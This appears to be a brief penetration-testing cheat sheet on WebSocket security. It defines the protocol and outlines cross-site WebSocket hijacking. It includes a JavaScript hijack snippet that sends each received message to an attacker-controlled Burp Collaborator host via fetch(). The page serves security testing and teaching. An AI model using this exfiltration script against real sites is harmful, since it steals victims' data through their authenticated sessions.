WebSocket is a computer communications protocol, providing full-duplex communication channels over a single TCP connection. The WebSocket protocol was standardized by the IETF as RFC 6455 in 2011. The current API specification allowing web applications to use this protocol is known as WebSockets.

-- Wikipedia


Generally any web security vulnerability may also arise using WebSockets.

Cross-site WebSocket hijacking (CSWSH)

  • Check if the WebSocket handshake is protected against CSRF

  • Hijack the socket by targeting a victim with something like the following script:

    var ws = new WebSocket('vulnerable-website.com/websocket');
    ws.onopen = function() {
    	// Send some stuff if needed
    ws.onmessage = function(event) {
    	// Receive data and send it to "us"
        fetch('xyz.burpcollaborator.com', { method: 'POST', mode: 'no-cors', body: event.data });

Last updated